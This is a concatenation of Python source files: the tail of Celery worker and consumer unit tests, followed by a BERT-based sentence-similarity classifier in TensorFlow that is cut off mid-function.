send_events=False)
l.qos = QoS(l.task_consumer, 10, l.logger)
info = l.info
self.assertEqual(info["prefetch_count"], 10)
self.assertFalse(info["broker"])
l.connection = current_app.broker_connection()
info = l.info
self.assertTrue(info["broker"])
def test_connection(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.reset_connection()
self.assertIsInstance(l.connection, BrokerConnection)
l._state = RUN
l.event_dispatcher = None
l.stop_consumers(close=False)
self.assertTrue(l.connection)
l._state = RUN
l.stop_consumers()
self.assertIsNone(l.connection)
self.assertIsNone(l.task_consumer)
l.reset_connection()
self.assertIsInstance(l.connection, BrokerConnection)
l.stop_consumers()
l.stop()
l.close_connection()
self.assertIsNone(l.connection)
self.assertIsNone(l.task_consumer)
def test_close_connection(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l._state = RUN
l.close_connection()
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
eventer = l.event_dispatcher = MockEventDispatcher()
heart = l.heart = MockHeart()
l._state = RUN
l.stop_consumers()
self.assertTrue(eventer.closed)
self.assertTrue(heart.closed)
def test_receive_message_unknown(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
backend = MockBackend()
m = create_message(backend, unknown={"baz": "!!!"})
l.event_dispatcher = MockEventDispatcher()
l.pidbox_node = MockNode()
def with_catch_warnings(log):
l.receive_message(m.decode(), m)
self.assertTrue(log)
self.assertIn("unknown message", log[0].message.args[0])
context = catch_warnings(record=True)
execute_context(context, with_catch_warnings)
def test_receive_message_eta_OverflowError(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
backend = MockBackend()
called = [False]
def to_timestamp(d):
called[0] = True
raise OverflowError()
m = create_message(backend, task=foo_task.name,
args=("2, 2"),
kwargs={},
eta=datetime.now().isoformat())
l.event_dispatcher = MockEventDispatcher()
l.pidbox_node = MockNode()
prev, timer2.to_timestamp = timer2.to_timestamp, to_timestamp
try:
l.receive_message(m.decode(), m)
self.assertTrue(m.acknowledged)
self.assertTrue(called[0])
finally:
timer2.to_timestamp = prev
def test_receive_message_InvalidTaskError(self):
logger = MockLogger()
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, logger,
send_events=False)
backend = MockBackend()
m = create_message(backend, task=foo_task.name,
args=(1, 2), kwargs="foobarbaz", id=1)
l.event_dispatcher = MockEventDispatcher()
l.pidbox_node = MockNode()
l.receive_message(m.decode(), m)
self.assertIn("Invalid task ignored", logger.logged[0])
def test_on_decode_error(self):
logger = MockLogger()
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, logger,
send_events=False)
class MockMessage(object):
content_type = "application/x-msgpack"
content_encoding = "binary"
body = "foobarbaz"
acked = False
def ack(self):
self.acked = True
message = MockMessage()
l.on_decode_error(message, KeyError("foo"))
self.assertTrue(message.acked)
self.assertIn("Can't decode message body", logger.logged[0])
def test_receieve_message(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
backend = MockBackend()
m = create_message(backend, task=foo_task.name,
args=[2, 4, 8], kwargs={})
l.event_dispatcher = MockEventDispatcher()
l.receive_message(m.decode(), m)
in_bucket = self.ready_queue.get_nowait()
self.assertIsInstance(in_bucket, TaskRequest)
self.assertEqual(in_bucket.task_name, foo_task.name)
self.assertEqual(in_bucket.execute(), 2 * 4 * 8)
self.assertTrue(self.eta_schedule.empty())
def test_start_connection_error(self):
class MockConsumer(MainConsumer):
iterations = 0
def consume_messages(self):
if not self.iterations:
self.iterations = 1
raise KeyError("foo")
raise SyntaxError("bar")
l = MockConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False, pool=BasePool())
l.connection_errors = (KeyError, )
self.assertRaises(SyntaxError, l.start)
l.heart.stop()
def test_consume_messages(self):
class Connection(current_app.broker_connection().__class__):
obj = None
def drain_events(self, **kwargs):
self.obj.connection = None
class Consumer(object):
consuming = False
prefetch_count = 0
def consume(self):
self.consuming = True
def qos(self, prefetch_size=0, prefetch_count=0,
apply_global=False):
self.prefetch_count = prefetch_count
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.connection = Connection()
l.connection.obj = l
l.task_consumer = Consumer()
l.qos = QoS(l.task_consumer, 10, l.logger)
l.consume_messages()
l.consume_messages()
self.assertTrue(l.task_consumer.consuming)
self.assertEqual(l.task_consumer.prefetch_count, 10)
l.qos.decrement()
l.consume_messages()
self.assertEqual(l.task_consumer.prefetch_count, 9)
def test_maybe_conn_error(self):
def raises(error):
def fun():
raise error
return fun
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.connection_errors = (KeyError, )
l.channel_errors = (SyntaxError, )
l.maybe_conn_error(raises(AttributeError("foo")))
l.maybe_conn_error(raises(KeyError("foo")))
l.maybe_conn_error(raises(SyntaxError("foo")))
self.assertRaises(IndexError, l.maybe_conn_error,
raises(IndexError("foo")))
def test_apply_eta_task(self):
from celery.worker import state
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.qos = QoS(None, 10, l.logger)
task = object()
qos = l.qos.value
l.apply_eta_task(task)
self.assertIn(task, state.reserved_requests)
self.assertEqual(l.qos.value, qos - 1)
self.assertIs(self.ready_queue.get_nowait(), task)
def test_receieve_message_eta_isoformat(self):
class MockConsumer(object):
prefetch_count_incremented = False
def qos(self, **kwargs):
self.prefetch_count_incremented = True
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
backend = MockBackend()
m = create_message(backend, task=foo_task.name,
eta=datetime.now().isoformat(),
args=[2, 4, 8], kwargs={})
l.task_consumer = MockConsumer()
l.qos = QoS(l.task_consumer, l.initial_prefetch_count, l.logger)
l.event_dispatcher = MockEventDispatcher()
l.receive_message(m.decode(), m)
l.eta_schedule.stop()
items = [entry[2] for entry in self.eta_schedule.queue]
found = 0
for item in items:
if item.args[0].task_name == foo_task.name:
found = True
self.assertTrue(found)
self.assertTrue(l.task_consumer.prefetch_count_incremented)
l.eta_schedule.stop()
def test_revoke(self):
ready_queue = FastQueue()
l = MyKombuConsumer(ready_queue, self.eta_schedule, self.logger,
send_events=False)
backend = MockBackend()
id = gen_unique_id()
t = create_message(backend, task=foo_task.name, args=[2, 4, 8],
kwargs={}, id=id)
from celery.worker.state import revoked
revoked.add(id)
l.receive_message(t.decode(), t)
self.assertTrue(ready_queue.empty())
def test_receieve_message_not_registered(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
backend = MockBackend()
m = create_message(backend, task="x.X.31x", args=[2, 4, 8], kwargs={})
l.event_dispatcher = MockEventDispatcher()
self.assertFalse(l.receive_message(m.decode(), m))
self.assertRaises(Empty, self.ready_queue.get_nowait)
self.assertTrue(self.eta_schedule.empty())
def test_receieve_message_eta(self):
l = MyKombuConsumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False)
l.event_dispatcher = MockEventDispatcher()
backend = MockBackend()
m = create_message(backend, task=foo_task.name,
args=[2, 4, 8], kwargs={},
eta=(datetime.now() +
timedelta(days=1)).isoformat())
l.reset_connection()
p = l.app.conf.BROKER_CONNECTION_RETRY
l.app.conf.BROKER_CONNECTION_RETRY = False
try:
l.reset_connection()
finally:
l.app.conf.BROKER_CONNECTION_RETRY = p
l.stop_consumers()
l.event_dispatcher = MockEventDispatcher()
l.receive_message(m.decode(), m)
l.eta_schedule.stop()
in_hold = self.eta_schedule.queue[0]
self.assertEqual(len(in_hold), 3)
eta, priority, entry = in_hold
task = entry.args[0]
self.assertIsInstance(task, TaskRequest)
self.assertEqual(task.task_name, foo_task.name)
self.assertEqual(task.execute(), 2 * 4 * 8)
self.assertRaises(Empty, self.ready_queue.get_nowait)
def test_start__consume_messages(self):
class _QoS(object):
prev = 3
value = 4
def update(self):
self.prev = self.value
class _Consumer(MyKombuConsumer):
iterations = 0
wait_method = None
def reset_connection(self):
if self.iterations >= 1:
raise KeyError("foo")
called_back = [False]
def init_callback(consumer):
called_back[0] = True
l = _Consumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False, init_callback=init_callback)
l.task_consumer = MockConsumer()
l.broadcast_consumer = MockConsumer()
l.qos = _QoS()
l.connection = BrokerConnection()
l.iterations = 0
def raises_KeyError(limit=None):
l.iterations += 1
if l.qos.prev != l.qos.value:
l.qos.update()
if l.iterations >= 2:
raise KeyError("foo")
l.consume_messages = raises_KeyError
self.assertRaises(KeyError, l.start)
self.assertTrue(called_back[0])
self.assertEqual(l.iterations, 1)
self.assertEqual(l.qos.prev, l.qos.value)
l = _Consumer(self.ready_queue, self.eta_schedule, self.logger,
send_events=False, init_callback=init_callback)
l.qos = _QoS()
l.task_consumer = MockConsumer()
l.broadcast_consumer = MockConsumer()
l.connection = BrokerConnection()
def raises_socket_error(limit=None):
l.iterations = 1
raise socket.error("foo")
l.consume_messages = raises_socket_error
self.assertRaises(socket.error, l.start)
self.assertTrue(called_back[0])
self.assertEqual(l.iterations, 1)
class test_WorkController(AppCase):
def setup(self):
self.worker = self.create_worker()
def create_worker(self, **kw):
worker = WorkController(concurrency=1, loglevel=0, **kw)
worker.logger = MockLogger()
return worker
def test_process_initializer(self):
from celery import Celery
from celery import platforms
from celery import signals
from celery.app import _tls
from celery.worker import process_initializer
from celery.worker import WORKER_SIGRESET, WORKER_SIGIGNORE
ignored_signals = []
reset_signals = []
worker_init = [False]
default_app = current_app
app = Celery(loader="default", set_as_current=False)
class Loader(object):
def init_worker(self):
worker_init[0] = True
app.loader = Loader()
def on_worker_process_init(**kwargs):
on_worker_process_init.called = True
on_worker_process_init.called = False
signals.worker_process_init.connect(on_worker_process_init)
def set_mp_process_title(title, hostname=None):
set_mp_process_title.called = (title, hostname)
set_mp_process_title.called = ()
pignore_signal = platforms.ignore_signal
preset_signal = platforms.reset_signal
psetproctitle = platforms.set_mp_process_title
platforms.ignore_signal = lambda sig: ignored_signals.append(sig)
platforms.reset_signal = lambda sig: reset_signals.append(sig)
platforms.set_mp_process_title = set_mp_process_title
try:
process_initializer(app, "awesome.worker.com")
self.assertItemsEqual(ignored_signals, WORKER_SIGIGNORE)
self.assertItemsEqual(reset_signals, WORKER_SIGRESET)
self.assertTrue(worker_init[0])
self.assertTrue(on_worker_process_init.called)
self.assertIs(_tls.current_app, app)
self.assertTupleEqual(set_mp_process_title.called,
("celeryd", "awesome.worker.com"))
finally:
platforms.ignore_signal = pignore_signal
platforms.reset_signal = preset_signal
platforms.set_mp_process_title = psetproctitle
default_app.set_current()
def test_with_rate_limits_disabled(self):
worker = WorkController(concurrency=1, loglevel=0,
disable_rate_limits=True)
self.assertTrue(hasattr(worker.ready_queue, "put"))
def test_attrs(self):
worker = self.worker
self.assertIsInstance(worker.scheduler, Timer)
self.assertTrue(worker.scheduler)
self.assertTrue(worker.pool)
self.assertTrue(worker.consumer)
self.assertTrue(worker.mediator)
self.assertTrue(worker.components)
def test_with_embedded_celerybeat(self):
worker = WorkController(concurrency=1, loglevel=0,
embed_clockservice=True)
self.assertTrue(worker.beat)
self.assertIn(worker.beat, worker.components)
def test_with_autoscaler(self):
worker = self.create_worker(autoscale=[10, 3], send_events=False,
eta_scheduler_cls="celery.utils.timer2.Timer")
self.assertTrue(worker.autoscaler)
def test_dont_stop_or_terminate(self):
worker = WorkController(concurrency=1, loglevel=0)
worker.stop()
self.assertNotEqual(worker._state, worker.CLOSE)
worker.terminate()
self.assertNotEqual(worker._state, worker.CLOSE)
sigsafe, worker.pool.signal_safe = worker.pool.signal_safe, False
try:
worker._state = worker.RUN
worker.stop(in_sighandler=True)
self.assertNotEqual(worker._state, worker.CLOSE)
worker.terminate(in_sighandler=True)
self.assertNotEqual(worker._state, worker.CLOSE)
finally:
worker.pool.signal_safe = sigsafe
def test_on_timer_error(self):
worker = WorkController(concurrency=1, loglevel=0)
worker.logger = MockLogger()
try:
raise KeyError("foo")
except KeyError:
exc_info = sys.exc_info()
worker.on_timer_error(exc_info)
logged = worker.logger.logged[0]
self.assertIn("KeyError", logged)
def test_on_timer_tick(self):
worker = WorkController(concurrency=1, loglevel=10)
worker.logger = MockLogger()
worker.timer_debug = worker.logger.debug
worker.on_timer_tick(30.0)
logged = worker.logger.logged[0]
self.assertIn("30.0", logged)
def test_process_task(self):
worker = self.worker
worker.pool = MockPool()
backend = MockBackend()
m = create_message(backend, task=foo_task.name, args=[4, 8, 10],
kwargs={})
task = TaskRequest.from_message(m, m.decode())
worker.process_task(task)
worker.pool.stop()
def test_process_task_raise_base(self):
worker = self.worker
worker.pool = MockPool(raise_base=True)
backend = MockBackend()
m = create_message(backend, task=foo_task.name, args=[4, 8, 10],
kwargs={})
task = TaskRequest.from_message(m, m.decode())
worker.components = []
worker._state = worker.RUN
self.assertRaises(KeyboardInterrupt, worker.process_task, task)
self.assertEqual(worker._state, worker.TERMINATE)
def test_process_task_raise_SystemTerminate(self):
worker = self.worker
worker.pool = MockPool(raise_SystemTerminate=True)
backend = MockBackend()
m = create_message(backend, task=foo_task.name, args=[4, 8, 10],
kwargs={})
task = TaskRequest.from_message(m, m.decode())
worker.components = []
worker._state = worker.RUN
self.assertRaises(SystemExit, worker.process_task, task)
self.assertEqual(worker._state, worker.TERMINATE)
def test_process_task_raise_regular(self):
worker = self.worker
worker.pool = MockPool(raise_regular=True)
backend = MockBackend()
m = create_message(backend, task=foo_task.name, args=[4, 8, 10],
kwargs={})
task = TaskRequest.from_message(m, m.decode())
worker.process_task(task)
worker.pool.stop()
def test_start_catches_base_exceptions(self):
class Component(object):
stopped = False
terminated = False
def __init__(self, exc):
self.exc = exc
def start(self):
raise self.exc
def terminate(self):
self.terminated = True
def stop(self):
self.stopped = True
worker1 = self.create_worker()
worker1.components = [Component(SystemTerminate())]
self.assertRaises(SystemExit, worker1.start)
self.assertTrue(worker1.components[0].terminated)
worker2 = self.create_worker()
worker2.components = [Component(SystemExit())]
self.assertRaises(SystemExit, worker2.start)
self.assertTrue(worker2.components[0].stopped)
def test_state_db(self):
from celery.worker import state
Persistent = state.Persistent
class MockPersistent(Persistent):
def _load(self):
return {}
state.Persistent = MockPersistent
try:
worker = self.create_worker(db="statefilename")
self.assertTrue(worker._finalize_db)
worker._finalize_db.cancel()
finally:
state.Persistent = Persistent
@skip("Issue #264")
def test_disable_rate_limits(self):
from celery.worker.buckets import FastQueue
worker = self.create_worker(disable_rate_limits=True)
self.assertIsInstance(worker.ready_queue, FastQueue)
self.assertIsNone(worker.mediator)
self.assertEqual(worker.ready_queue.put, worker.process_task)
def test_start__stop(self):
worker = self.worker
w1 = {"started": False}
w2 = {"started": False}
w3 = {"started": False}
w4 = {"started": False}
worker.components = [MockController(w1), MockController(w2),
MockController(w3), MockController(w4)]
worker.start()
for w in (w1, w2, w3, w4):
self.assertTrue(w["started"])
self.assertTrue(worker._running, len(worker.components))
worker.stop()
for component in worker.components:
self.assertTrue(component._stopped)
def test_start__terminate(self):
worker = self.worker
w1 = {"started": False}
w2 = {"started": False}
w3 = {"started": False}
w4 = {"started": False}
worker.components = [MockController(w1), MockController(w2),
MockController(w3), MockController(w4),
MockPool()]
worker.start()
for w in (w1, w2, w3, w4):
self.assertTrue(w["started"])
self.assertTrue(worker._running, len(worker.components))
self.assertEqual(worker._state, RUN)
worker.terminate()
for component in worker.components:
self.assertTrue(component._stopped)
self.assertTrue(worker.components[4]._terminated)
|
similarity.py
|
import os
from queue import Queue
from threading import Thread
import pandas as pd
import tensorflow as tf
import collections
import args
import tokenization
import modeling
import optimization
# os.environ['CUDA_VISIBLE_DEVICES'] = '1'
class InputExample(object):
"""A single training/test example for simple sequence classification."""
def __init__(self, guid, text_a, text_b=None, label=None):
"""Constructs a InputExample.
Args:
guid: Unique id for the example.
text_a: string. The untokenized text of the first sequence. For single
sequence tasks, only this sequence must be specified.
text_b: (Optional) string. The untokenized text of the second sequence.
Only must be specified for sequence pair tasks.
label: (Optional) string. The label of the example. This should be
specified for train and dev examples, but not for test examples.
"""
self.guid = guid
self.text_a = text_a
self.text_b = text_b
self.label = label
class InputFeatures(object):
"""A single set of features of data."""
def __init__(self, input_ids, input_mask, segment_ids, label_id):
self.input_ids = input_ids
self.input_mask = input_mask
self.segment_ids = segment_ids
self.label_id = label_id
class DataProcessor(object):
"""Base class for data converters for sequence classification data sets."""
def get_train_examples(self, data_dir):
"""Gets a collection of `InputExample`s for the train set."""
raise NotImplementedError()
def get_dev_examples(self, data_dir):
"""Gets a collection of `InputExample`s for the dev set."""
raise NotImplementedError()
def get_test_examples(self, data_dir):
"""Gets a collection of `InputExample`s for prediction."""
raise NotImplementedError()
def get_labels(self):
"""Gets the list of labels for this data set."""
raise NotImplementedError()
class SimProcessor(DataProcessor):
def get_train_examples(self, data_dir):
file_path = os.path.join(data_dir, 'train.csv')
train_df = pd.read_csv(file_path, encoding='utf-8')
train_data = []
for index, train in enumerate(train_df.values):
guid = 'train-%d' % index
text_a = tokenization.convert_to_unicode(str(train[0]))
text_b = tokenization.convert_to_unicode(str(train[1]))
label = str(train[2])
train_data.append(InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label))
return train_data
def get_dev_examples(self, data_dir):
file_path = os.path.join(data_dir, 'dev.csv')
dev_df = pd.read_csv(file_path, encoding='utf-8')
dev_data = []
for index, dev in enumerate(dev_df.values):
guid = 'test-%d' % index
text_a = tokenization.convert_to_unicode(str(dev[0]))
text_b = tokenization.convert_to_unicode(str(dev[1]))
label = str(dev[2])
dev_data.append(InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label))
return dev_data
def get_test_examples(self, data_dir):
file_path = os.path.join(data_dir, 'test.csv')
test_df = pd.read_csv(file_path, encoding='utf-8')
test_data = []
for index, test in enumerate(test_df.values):
guid = 'test-%d' % index
text_a = tokenization.convert_to_unicode(str(test[0]))
text_b = tokenization.convert_to_unicode(str(test[1]))
label = str(test[2])
test_data.append(InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label))
return test_data
def get_sentence_examples(self, questions):
for index, data in enumerate(questions):
guid = 'test-%d' % index
text_a = tokenization.convert_to_unicode(str(data[0]))
text_b = tokenization.convert_to_unicode(str(data[1]))
label = str(0)
yield InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label)
def get_labels(self):
return ['0', '1']
class BertSim:
def __init__(self, batch_size=args.batch_size):
self.mode = None
self.max_seq_length = args.max_seq_len
self.tokenizer = tokenization.FullTokenizer(vocab_file=args.vocab_file, do_lower_case=True)
self.batch_size = batch_size
self.estimator = None
self.processor = SimProcessor()
tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.INFO)
def set_mode(self, mode):
self.mode = mode
self.estimator = self.get_estimator()
if mode == tf.estimator.ModeKeys.PREDICT:
self.input_queue = Queue(maxsize=1)
self.output_queue = Queue(maxsize=1)
self.predict_thread = Thread(target=self.predict_from_queue, daemon=True)
self.predict_thread.start()
def create_model(bert_config, is_training, input_ids, input_mask, segment_ids,
labels, num_labels, use_one_hot_embeddings):
"""Creates a classification model."""
model = modeling.BertModel(
config=bert_config,
is_training=is_training,
input_ids=input_ids,
input_mask=input_mask,
token_type_ids=segment_ids,
use_one_hot_embeddings=use_one_hot_embeddings)
# In the demo, we are doing a simple classification task on the entire
# segment.
#
# If you want to use the token-level output, use model.get_sequence_output()
# instead.
output_layer = model.get_pooled_output()
hidden_size = output_layer.shape[-1].value
output_weights = tf.compat.v1.get_variable(
"output_weights", [num_labels, hidden_size],
initializer=tf.compat.v1.truncated_normal_initializer(stddev=0.02))
output_bias = tf.compat.v1.get_variable(
"output_bias", [num_labels], initializer=tf.compat.v1.zeros_initializer())
with tf.compat.v1.variable_scope("loss"):
if is_training:
# I.e., 0.1 dropout
output_layer = tf.nn.dropout(output_layer, rate=1 - (0.9))
logits = tf.matmul(output_layer, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
probabilities = tf.nn.softmax(logits, axis=-1)
log_probs = tf.nn.log_softmax(logits, axis=-1)
one_hot_labels = tf.one_hot(labels, depth=num_labels, dtype=tf.float32)
per_example_loss = -tf.reduce_sum(input_tensor=one_hot_labels * log_probs, axis=-1)
loss = tf.reduce_mean(input_tensor=per_example_loss)
return (loss, per_example_loss, logits, probabilities)
def model_fn_builder(self, bert_config, num_labels, init_checkpoint, learning_rate,
num_train_steps, num_warmup_steps,
use_one_hot_embeddings):
"""Returns `model_fn` closurimport_tfe for TPUEstimator."""
def model_fn(features, labels, mode, params): # pylint: disable=unused-argument
from tensorflow.python.estimator.model_fn import EstimatorSpec
tf.compat.v1.logging.info("*** Features ***")
for name in sorted(features.keys()):
tf.compat.v1.logging.info(" name = %s, shape = %s" % (name, features[name].shape))
input_ids = features["input_ids"]
input_mask = features["input_mask"]
segment_ids = features["segment_ids"]
label_ids = features["label_ids"]
is_training = (mode == tf.estimator.ModeKeys.TRAIN)
(total_loss, per_example_loss, logits, probabilities) = BertSim.create_model(
bert_config, is_training, input_ids, input_mask, segment_ids, label_ids,
num_labels, use_one_hot_embeddings)
tvars = tf.compat.v1.trainable_variables()
initialized_variable_names = {}
if init_checkpoint:
(assignment_map, initialized_variable_names) \
= modeling.get_assignment_map_from_checkpoint(tvars, init_checkpoint)
tf.compat.v1.train.init_from_checkpoint(init_checkpoint, assignment_map)
tf.compat.v1.logging.info("**** Trainable Variables ****")
for var in tvars:
init_string = ""
if var.name in initialized_variable_names:
init_string = ", *INIT_FROM_CKPT*"
tf.compat.v1.logging.info(" name = %s, shape = %s%s", var.name, var.shape,
init_string)
if mode == tf.estimator.ModeKeys.TRAIN:
train_op = optimization.create_optimizer(
total_loss, learning_rate, num_train_steps, num_warmup_steps, False)
output_spec = EstimatorSpec(
mode=mode,
loss=total_loss,
train_op=train_op)
elif mode == tf.estimator.ModeKeys.EVAL:
def metric_fn(per_example_loss, label_ids, logits):
predictions = tf.argmax(input=logits, axis=-1, output_type=tf.int32)
accuracy = tf.compat.v1.metrics.accuracy(label_ids, predictions)
auc = tf.compat.v1.metrics.auc(label_ids, predictions)
loss = tf.compat.v1.metrics.mean(per_example_loss)
return {
"eval_accuracy": accuracy,
"eval_auc": auc,
"eval_loss": loss,
}
eval_metrics = metric_fn(per_example_loss, label_ids, logits)
output_spec = EstimatorSpec(
mode=mode,
loss=total_loss,
eval_metric_ops=eval_metrics)
else:
output_spec = EstimatorSpec(mode=mode, predictions=probabilities)
return output_spec
return model_fn
def get_estimator(self):
from tensorflow.python.estimator.estimator import Estimator
from tensorflow.python.estimator.run_config import RunConfig
bert_config = modeling.BertConfig.from_json_file(args.config_name)
label_list = self.processor.get_labels()
train_examples = self.processor.get_train_examples(args.data_dir)
num_train_steps = int(
len(train_examples) / self.batch_size * args.num_train_epochs)
num_warmup_steps = int(num_train_steps * 0.1)
if self.mode == tf.estimator.ModeKeys.TRAIN:
init_checkpoint = args.ckpt_name
else:
init_checkpoint = args.output_dir
model_fn = self.model_fn_builder(
bert_config=bert_config,
num_labels=len(label_list),
init_checkpoint=init_checkpoint,
learning_rate=args.learning_rate,
num_train_steps=num_train_steps,
num_warmup_steps=num_warmup_steps,
use_one_hot_embeddings=False)
config = tf.compat.v1.ConfigProto()
config.gpu_options.allow_growth = True
config.gpu_options.per_process_gpu_memory_fraction = args.gpu_memory_fraction
config.log_device_placement = False
return Estimator(model_fn=model_fn, config=RunConfig(session_config=config), model_dir=args.output_dir,
params={'batch_size': self.batch_size})
def predict_from_queue(self):
for i in self.estimator.predict(input_fn=self.queue_predict_input_fn, yield_single_examples=False):
self.output_queue.put(i)
def queue_predict_input_fn(self):
return (tf.data.Dataset.from_generator(
self.generate_from_queue,
output_types={
'input_ids': tf.int32,
'input_mask': tf.int32,
'segment_ids': tf.int32,
'label_ids': tf.int32},
output_shapes={
'input_ids': (None, self.max_seq_length),
'input_mask': (None, self.max_seq_length),
'segment_ids': (None, self.max_seq_length),
'label_ids': (1,)}).prefetch(10))
def convert_examples_to_features(self, examples, label_list, max_seq_length, tokenizer):
"""Convert a set of `InputExample`s to a list of `InputFeatures`."""
for (ex_index, example) in enumerate(examples):
label_map = {}
for (i, label) in enumerate(label_list):
label_map[label] = i
tokens_a = tokenizer.tokenize(example.text_a)
tokens_b = None
if example.text_b:
tokens_b = tokenizer.tokenize(example.text_b)
if tokens_b:
# Modifies `tokens_a` and `tokens_b` in place so that the total
# length is less than the specified length.
# Account for [CLS], [SEP], [SEP] with "- 3"
self._truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3)
else:
# Account for [CLS] and [SEP] with "- 2"
if len(tokens_a) > max_seq_length - 2:
tokens_a = tokens_a[0:(max_seq_length - 2)]
# The convention in BERT is:
# (a) For sequence pairs:
# tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP]
# type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1
# (b) For single sequences:
# tokens: [CLS] the dog is hairy . [SEP]
# type_ids: 0 0 0 0 0 0 0
#
# Where "type_ids" are used to indicate whether this is the first
# sequence or the second sequence. The embedding vectors for `type=0` and
# `type=1` were learned during pre-training and are added to the wordpiece
# embedding vector (and position vector). This is not *strictly* necessary
# since the [SEP] token unambiguously separates the sequences, but it makes
# it easier for the model to learn the concept of sequences.
#
# For classification tasks, the first vector (corresponding to [CLS]) is
# used as as the "sentence vector". Note that this only makes sense because
# the entire model is fine-tuned.
tokens = []
segment_ids = []
tokens.append("[CLS]")
segment_ids.append(0)
for token in tokens_a:
tokens.append(token)
segment_ids.append(0)
tokens.append("[SEP]")
segment_ids.append(0)
if tokens_b:
for token in tokens_b:
tokens.append(token)
segment_ids.append(1)
tokens.append("[SEP]")
segment_ids.append(1)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
# Zero-pad up to the sequence length.
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
label_id = label_map[example.label]
if ex_index < 5:
tf.compat.v1.logging.info("*** Example ***")
tf.compat.v1.logging.info("guid: %s" % (example.guid))
tf.compat.v1.logging.info("tokens: %s" % " ".join(
[tokenization.printable_text(x) for x in tokens]))
tf.compat.v1.logging.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
tf.compat.v1.logging.info("input_mask: %s" % " ".join([str(x) for x in input_mask]))
tf.compat.v1.logging.info("segment_ids: %s" % " ".join([str(x) for x in segment_ids]))
tf.compat.v1.logging.info("label: %s (id = %d)" % (example.label, label_id))
feature = InputFeatures(
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
label_id=label_id)
yield feature
def generate_from_queue(self):
while True:
predict_examples = self.processor.get_sentence_examples(self.input_queue.get())
features = list(self.convert_examples_to_features(predict_examples, self.processor.get_labels(),
args.max_seq_len, self.tokenizer))
yield {
'input_ids': [f.input_ids for f in features],
'input_mask': [f.input_mask for f in features],
'segment_ids': [f.segment_ids for f in features],
'label_ids': [f.label_id for f in features]
}
def _truncate_seq_pair(self, tokens_a, tokens_b, max_length):
"""Truncates a sequence pair in place to the maximum length."""
# This is a simple heuristic which will always truncate the longer sequence
# one token at a time. This makes more sense than truncating an equal percent
# of tokens from each, since if one sequence is very short then each token
# that's truncated likely contains more information than a longer sequence.
while True:
total_length = len(tokens_a) + len(tokens_b)
if total_length <= max_length:
break
if len(tokens_a) > len(tokens_b):
tokens_a.pop()
else:
tokens_b.pop()
def convert_single_example(self, ex_index, example, label_list, max_seq_length, tokenizer):
"""Converts a single `InputExample` into a single `InputFeatures`."""
label_map = {}
for (i, label) in enumerate(label_list):
label_map[label] = i
tokens_a = tokenizer.tokenize(example.text_a)
tokens_b = None
if example.text_b:
tokens_b = tokenizer.tokenize(example.text_b)
if tokens_b:
# Modifies `tokens_a` and `tokens_b` in place so that the total
# length is less than the specified length.
# Account for [CLS], [SEP], [SEP] with "- 3"
self._truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3)
else:
# Account for [CLS] and [SEP] with "- 2"
if len(tokens_a) > max_seq_length - 2:
tokens_a = tokens_a[0:(max_seq_length - 2)]
# The convention in BERT is:
# (a) For sequence pairs:
# tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP]
# type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1
# (b) For single sequences:
# tokens: [CLS] the dog is hairy . [SEP]
# type_ids: 0 0 0 0 0 0 0
#
# Where "type_ids" are used to indicate whether this is the first
# sequence or the second sequence. The embedding vectors for `type=0` and
# `type=1` were learned during pre-training and are added to the wordpiece
# embedding vector (and position vector). This is not *strictly* necessary
# since the [SEP] token unambiguously separates the sequences, but it makes
# it easier for the model to learn the concept of sequences.
#
# For classification tasks, the first vector (corresponding to [CLS]) is
# used as as the "sentence vector". Note that this only makes sense because
# the entire model is fine-tuned.
tokens = []
segment_ids = []
tokens.append("[CLS]")
segment_ids.append(0)
for token in tokens_a:
tokens.append(token)
segment_ids.append(0)
tokens.append("[SEP]")
segment_ids.append(0)
if tokens_b:
for token in tokens_b:
tokens.append(token)
segment_ids.append(1)
tokens.append("[SEP]")
segment_ids.append(1)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
# Zero-pad up to the sequence length.
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
label_id = label_map[example.label]
if ex_index < 5:
